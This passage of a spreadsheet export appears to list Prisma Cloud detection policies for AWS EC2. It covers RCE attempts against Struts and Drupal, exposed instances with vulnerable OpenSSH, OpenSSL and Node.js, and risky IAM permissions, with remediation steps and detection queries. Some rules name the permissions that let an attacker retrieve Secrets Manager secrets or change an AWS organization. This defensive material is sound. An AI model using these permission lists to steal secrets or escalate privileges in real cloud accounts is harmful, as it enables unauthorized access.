https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html#using-instance-addressing-eips-associating-different</t>
        </is>
      </c>
      <c r="Y1703" t="inlineStr"/>
      <c r="Z1703" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-ec2-describe-instances' AND json.rule = networkInterfaces[*].association.publicIp exists</t>
        </is>
      </c>
      <c r="AA1703" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1703" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1703" t="inlineStr">
        <is>
          <t>PC-AWS-EC2-1256</t>
        </is>
      </c>
      <c r="AD1703" t="b">
        <v>1</v>
      </c>
      <c r="AE1703" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1703" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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03" t="inlineStr">
        <is>
          <t>f42e2e3c-cb67-4771-a1b5-53759c5736ee</t>
        </is>
      </c>
      <c r="AI1703" t="inlineStr">
        <is>
          <t>f0cfbbfb-e79f-4290-8832-7c72e102ebec</t>
        </is>
      </c>
      <c r="AJ1703" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1703" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1704">
      <c r="A1704" t="inlineStr"/>
      <c r="B1704" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1704" s="2" t="inlineStr"/>
      <c r="D1704" t="inlineStr"/>
      <c r="E1704" t="inlineStr"/>
      <c r="F1704" t="inlineStr"/>
      <c r="G1704" t="b">
        <v>1</v>
      </c>
      <c r="H17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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1704" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1704" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Apache Struts OGNL Evaluation, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L1704" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1704" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1704" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1704" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1704" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1704" t="inlineStr"/>
      <c r="R1704" t="inlineStr"/>
      <c r="S1704" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1704" t="b">
        <v>0</v>
      </c>
      <c r="U1704" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1704" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1704" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to remote code execution (RCE) with exploits in the wild [OGNL Evaluation Injection, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Apache Struts software prone to OGNL Evaluation makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Apache Struts OGNL Evaluation Injection vulnerabilities reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X170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CVE-2020-17530
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
    https://nvd.nist.gov/vuln/detail/CVE-2020-17530
    https://nvd.nist.gov/vuln/detail/CVE-2019-0230
    https://nvd.nist.gov/vuln/detail/CVE-2018-11776
    https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    https://nvd.nist.gov/vuln/detail/CVE-2016-4461
    https://nvd.nist.gov/vuln/detail/CVE-2016-0785
    https://nvd.nist.gov/vuln/detail/CVE-2013-2135
    https://nvd.nist.gov/vuln/detail/CVE-2013-2134
    https://nvd.nist.gov/vuln/detail/CVE-2022-26134
    https://nvd.nist.gov/vuln/detail/CVE-2016-3081
    https://nvd.nist.gov/vuln/detail/CVE-2017-12611</t>
        </is>
      </c>
      <c r="Y1704" t="inlineStr"/>
      <c r="Z1704" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-17530, CVE-2019-0230, CVE-2018-11776, CVE-2017-5638, CVE-2016-4461, CVE-2016-0785, CVE-2013-2135, CVE-2013-2134, CVE-2022-26134, CVE-2016-3081, CVE-2017-12611 - OGNL Evaluation Injection) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-17530', 'CVE-2019-0230', 'CVE-2018-11776', 'CVE-2017-5638', 'CVE-2016-4461', 'CVE-2016-0785', 'CVE-2013-2135', 'CVE-2013-2134', 'CVE-2022-26134', 'CVE-2016-3081', 'CVE-2017-12611'))</t>
        </is>
      </c>
      <c r="AA1704" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1704" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:36</t>
        </is>
      </c>
      <c r="AC1704" t="inlineStr"/>
      <c r="AD1704" t="b">
        <v>1</v>
      </c>
      <c r="AE1704" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1704" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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4" t="inlineStr">
        <is>
          <t>b05672aa-10b7-4c85-a8fc-09297ec9144c</t>
        </is>
      </c>
      <c r="AI1704" t="inlineStr">
        <is>
          <t>762b4a44-d914-4f5d-9cc6-b8541ecbce9e</t>
        </is>
      </c>
      <c r="AJ1704" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1704" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1705">
      <c r="A1705" t="inlineStr"/>
      <c r="B1705" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1705" s="2" t="inlineStr"/>
      <c r="D1705" t="inlineStr"/>
      <c r="E1705" t="inlineStr"/>
      <c r="F1705" t="inlineStr"/>
      <c r="G1705" t="b">
        <v>1</v>
      </c>
      <c r="H17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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1705" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1705" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on AWS EC2 instance with known exploitable vulnerability [Drupalgeddon2, CVE-2018-7600]</t>
        </is>
      </c>
      <c r="L1705" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M1705" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1705" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1705" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1705" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q1705" t="inlineStr"/>
      <c r="R1705" t="inlineStr"/>
      <c r="S1705" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1705" t="b">
        <v>0</v>
      </c>
      <c r="U1705" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1705" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1705" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on AWS EC2 instances that are vulnerable to Remote Code Execution (RCE) with exploits in the wild [Drupalgeddon2, CVE-2018-7600].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable EC2 instance. The fact that the EC2 instance has a vulnerable version of Drupal installed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the Drupalgeddon2 [CVE-2018-7600] vulnerability reported for the EC2 instance.</t>
        </is>
      </c>
      <c r="X170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CVE-2018-7600
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2018-7600</t>
        </is>
      </c>
      <c r="Y1705" t="inlineStr"/>
      <c r="Z1705" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2018-7600 - Drupalgeddon2) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2018-7600'))</t>
        </is>
      </c>
      <c r="AA1705" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1705" t="inlineStr">
        <is>
          <t>2023-10-27 06:55:34</t>
        </is>
      </c>
      <c r="AC1705" t="inlineStr"/>
      <c r="AD1705" t="b">
        <v>1</v>
      </c>
      <c r="AE1705" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1705" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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5" t="inlineStr">
        <is>
          <t>bff88d23-2d52-4fc9-bd0e-d4758d1a81de</t>
        </is>
      </c>
      <c r="AI1705" t="inlineStr">
        <is>
          <t>cc8cd54d-798a-49b7-9b1c-59be5991475d</t>
        </is>
      </c>
      <c r="AJ1705" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1705" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1706">
      <c r="A1706" t="inlineStr"/>
      <c r="B1706" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1706" s="2" t="inlineStr"/>
      <c r="D1706" t="n">
        <v>3</v>
      </c>
      <c r="E1706" t="n">
        <v>0</v>
      </c>
      <c r="F1706" t="n">
        <v>0</v>
      </c>
      <c r="G1706" t="b">
        <v>1</v>
      </c>
      <c r="H17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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1706" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1706" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS EC2 instance (OpenSSH, CVE-2023-38408)</t>
        </is>
      </c>
      <c r="L1706" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1706" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1706" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1706" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1706" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1706" t="inlineStr"/>
      <c r="R1706" t="inlineStr"/>
      <c r="S1706" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1706" t="b">
        <v>0</v>
      </c>
      <c r="U1706" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1706" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1706" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instance that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-38408).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OpenSSH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OpenSSH (CVE-2023-38408) vulnerability and public exposure reported for the affected AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X170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CVE-2023-38408
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-38408</t>
        </is>
      </c>
      <c r="Y1706" t="inlineStr"/>
      <c r="Z1706" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-38408'))</t>
        </is>
      </c>
      <c r="AA1706" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1706" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:11</t>
        </is>
      </c>
      <c r="AC1706" t="inlineStr"/>
      <c r="AD1706" t="b">
        <v>1</v>
      </c>
      <c r="AE1706" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1706" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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6" t="inlineStr">
        <is>
          <t>ec8266ec-d2e1-47da-b162-bbf6970d0949</t>
        </is>
      </c>
      <c r="AI1706" t="inlineStr">
        <is>
          <t>e6b00c05-6d4c-40b9-97c4-28f3dea671c6</t>
        </is>
      </c>
      <c r="AJ1706" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1706" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1707">
      <c r="A1707" t="inlineStr"/>
      <c r="B1707" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1707" s="2" t="inlineStr"/>
      <c r="D1707" t="inlineStr"/>
      <c r="E1707" t="inlineStr"/>
      <c r="F1707" t="inlineStr"/>
      <c r="G1707" t="b">
        <v>1</v>
      </c>
      <c r="H17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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1707" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1707" t="inlineStr">
        <is>
          <t>Server Side Request Forgery (SSRF) risk due to publicly exposed and vulnerable AWS EC2 instance [Node.js, CVE-2020-28168]</t>
        </is>
      </c>
      <c r="L1707" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1707" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1707" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1707" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1707" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1707" t="inlineStr"/>
      <c r="R1707" t="inlineStr"/>
      <c r="S1707" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1707" t="b">
        <v>0</v>
      </c>
      <c r="U1707" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1707" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1707" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable server side request forgery vulnerability [Node.js, CVE-2020-28168].
Server side request forgery vulnerability is a security flaw allowing an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. The fact that the AWS EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Node.js [CVE-2020-28168] vulnerability and public exposure reported for the AWS EC2 instance as soon as possible.</t>
        </is>
      </c>
      <c r="X170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1707" t="inlineStr"/>
      <c r="Z1707" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-28168'))</t>
        </is>
      </c>
      <c r="AA1707" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1707" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:56</t>
        </is>
      </c>
      <c r="AC1707" t="inlineStr"/>
      <c r="AD1707" t="b">
        <v>1</v>
      </c>
      <c r="AE1707" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1707" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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7" t="inlineStr">
        <is>
          <t>485affec-3e5b-463c-a8a0-2f6669315031</t>
        </is>
      </c>
      <c r="AI1707" t="inlineStr">
        <is>
          <t>3feb2d6d-2389-45e0-8825-5fc0efe44702</t>
        </is>
      </c>
      <c r="AJ1707" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1707" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1708">
      <c r="A1708" t="inlineStr"/>
      <c r="B1708" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1708" s="2" t="inlineStr"/>
      <c r="D1708" t="inlineStr"/>
      <c r="E1708" t="inlineStr"/>
      <c r="F1708" t="inlineStr"/>
      <c r="G1708" t="b">
        <v>1</v>
      </c>
      <c r="H17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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1708" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1708" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to AWS EC2 instance with unusual usage of instance role credentials and risky Secrets Manager permissions</t>
        </is>
      </c>
      <c r="L1708" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M1708" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1708" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1708" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1708" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q1708" t="inlineStr"/>
      <c r="R1708" t="inlineStr"/>
      <c r="S1708" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1708" t="b">
        <v>0</v>
      </c>
      <c r="U1708" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1708" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1708" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances with unusual usage of instance role credentials and has risky access and decrypt Secrets Manager Secrets permissions.
Risky permissions on AWS EC2 instances with unusual usage of instance role credentials may allow an attacker to gain access to the EC2 instances with risky access and decrypt permissions could allow a malicious actor to retrieve sensitive secrets from Secrets Manager and unauthorized decryption of encrypted data through AWS Key Management Service (KMS). Unusual EC2 role credential usage from outside the cloud may indicate instance is already compromised.
This policy checks for the following risky access and decrypt Secrets Manager Secrets permissions:
'secretsmanager:GetSecretValue', 'kms:Decrypt'
Immediate attention is required to review unusual usage activity of instance role credentials and risky access and decrypt Secrets Manager Secrets permissions.</t>
        </is>
      </c>
      <c r="X1708"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08" t="inlineStr"/>
      <c r="Z1708" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('Unusual usage of Workload Credentials from outside the Cloud','AWS IAM policy allows access and decrypt Secrets Manager Secrets permissions')</t>
        </is>
      </c>
      <c r="AA1708" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1708" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:30</t>
        </is>
      </c>
      <c r="AC1708" t="inlineStr"/>
      <c r="AD1708" t="b">
        <v>1</v>
      </c>
      <c r="AE1708" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1708" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG17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8" t="inlineStr">
        <is>
          <t>69602219-3222-45eb-9686-ce8b8948a7d1</t>
        </is>
      </c>
      <c r="AI1708" t="inlineStr">
        <is>
          <t>2fc75f6c-6796-477a-9640-fe23baba6554</t>
        </is>
      </c>
      <c r="AJ1708" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1708" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1709">
      <c r="A1709" t="inlineStr"/>
      <c r="B1709" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1709" s="2" t="inlineStr"/>
      <c r="D1709" t="n">
        <v>1</v>
      </c>
      <c r="E1709" t="n">
        <v>0</v>
      </c>
      <c r="F1709" t="n">
        <v>0</v>
      </c>
      <c r="G1709" t="b">
        <v>1</v>
      </c>
      <c r="H17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09" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1709" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1709" t="inlineStr">
        <is>
          <t>Unauthorized changes risk to an entire AWS organization's resources and settings due to a publicly exposed AWS EC2 instance with ORG level 'write' permissions</t>
        </is>
      </c>
      <c r="L1709" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1709" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1709" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1709" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1709" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1709" t="inlineStr"/>
      <c r="R1709" t="inlineStr"/>
      <c r="S1709" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1709" t="b">
        <v>0</v>
      </c>
      <c r="U1709" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1709" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1709" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and ORG level WRITE permissions that could potentially lead to privilege escalation.
Publicly exposed EC2 instance having risky privilege escalation IAM permissions on the instance help the attackers to escalate their privilege and move laterally to perform unauthorized actions in the cloud account.
This policy checks for the following risky permissions that could potentially lead to privilege escalation:
'organizations:AcceptHandshake', 'organizations:AttachPolicy', 'organizations:CancelHandshake', 'organizations:CreateAccount', 'organizations:CreateGovCloudAccount', 'organizations:CreateOrganization', 'organizations:CreateOrganizationalUnit', 'organizations:CreatePolicy', 'organizations:DeclineHandshake', 'organizations:DeleteOrganization', 'organizations:DeleteOrganizationalUnit', 'organizations:DeletePolicy', 'organizations:DeregisterDelegatedAdministrator', 'organizations:DetachPolicy', 'organizations:DisableAWSServiceAccess', 'organizations:DisablePolicyType', 'organizations:EnableAWSServiceAccess', 'organizations:EnableAllFeatures', 'organizations:EnablePolicyType', 'organizations:InviteAccountToOrganization', 'organizations:LeaveOrganization', 'organizations:MoveAccount', 'organizations:RegisterDelegatedAdministrator', 'organizations:RemoveAccountFromOrganization', 'organizations:UpdateOrganizationalUnit', 'organizations:UpdatePolicy'
Immediate attention is required to review risky permissions and grant only the least privileges required. Remove unwanted permissions assigned to the EC2 instances. Restrict public exposure reported for the instances as soon as possible.</t>
        </is>
      </c>
      <c r="X170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09" t="inlineStr"/>
      <c r="Z1709" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)','AWS EC2 Instance with AWS Organization management permissions')</t>
        </is>
      </c>
      <c r="AA1709" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1709" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC1709" t="inlineStr"/>
      <c r="AD1709" t="b">
        <v>1</v>
      </c>
      <c r="AE1709" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1709" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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09" t="inlineStr">
        <is>
          <t>57295953-45d2-4678-be3a-9051d7aa67f5</t>
        </is>
      </c>
      <c r="AI1709" t="inlineStr">
        <is>
          <t>92dd95ae-8cfe-46fd-8f80-8344bb977b5b</t>
        </is>
      </c>
      <c r="AJ1709" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1709" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1710">
      <c r="A1710" t="inlineStr"/>
      <c r="B1710" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1710" s="2" t="inlineStr"/>
      <c r="D1710" t="inlineStr"/>
      <c r="E1710" t="inlineStr"/>
      <c r="F1710" t="inlineStr"/>
      <c r="G1710" t="b">
        <v>1</v>
      </c>
      <c r="H17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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1710" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1710" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable AWS EC2 instance [OpenSSL, CVE-2022-3602]</t>
        </is>
      </c>
      <c r="L1710" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1710" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1710" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1710" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1710" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1710" t="inlineStr"/>
      <c r="R1710" t="inlineStr"/>
      <c r="S1710" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1710" t="b">
        <v>0</v>
      </c>
      <c r="U1710" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1710" t="inlineStr">
        <is>
          <t>aws-ec2-describe-instances</t>
        </is>
      </c>
      <c r="W1710" t="inlineStr">
        <is>
          <t>This policy identifies AWS EC2 instances that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-3602].
Privilege escalation vulnerability is a security flaw allowing a user to gain unauthorized elevated system access. Exploiting this vulnerability compromises system security, enabling unauthorized data access or manipulation. The fact that the EC2 instance is publicly exposed makes it an easy target for an attacker to compromise the affected system. 
Immediate attention is required to remediate the OpenSSL [CVE-2022-3602] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X171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CVE-2022-3602
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-3602</t>
        </is>
      </c>
      <c r="Y1710" t="inlineStr"/>
      <c r="Z1710" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-ec2-describe-instances') and finding.name contains all ('AWS EC2 instance with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-3602'))</t>
        </is>
      </c>
      <c r="AA1710" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1710" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC1710" t="inlineStr"/>
      <c r="AD1710" t="b">
        <v>1</v>
      </c>
      <c r="AE1710" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1710" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG17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0" t="inlineStr">
        <is>
          <t>e31f9a88-83ea-456f-b01d-efd1402df86c</t>
        </is>
      </c>
      <c r="AI1710" t="inlineStr">
        <is>
          <t>e367e1d3-6065-44e5-b398-29010c19e984</t>
        </is>
      </c>
      <c r="AJ1710" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1710" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1711">
      <c r="A1711" t="inlineStr"/>
      <c r="B1711" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1711" s="2" t="inlineStr"/>
      <c r="D1711" t="inlineStr"/>
      <c r="E1711" t="inlineStr"/>
      <c r="F1711" t="inlineStr"/>
      <c r="G1711" t="b">
        <v>1</v>
      </c>
      <c r="H17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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1711" t="inlineStr">
        <is>
          <t>aws-ec2</t>
        </is>
      </c>
      <c r="K1711" t="inlineStr">
        <is>
          <t>Command execution risk due to publicly exposed and vulnerable AWS EC2 instance (Apache RocketMQ, CVE-2023-33246)</t>
        </is>
      </c>
      <c r="L1711" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1711" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1711" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1711" t="inlineStr">
        <is>
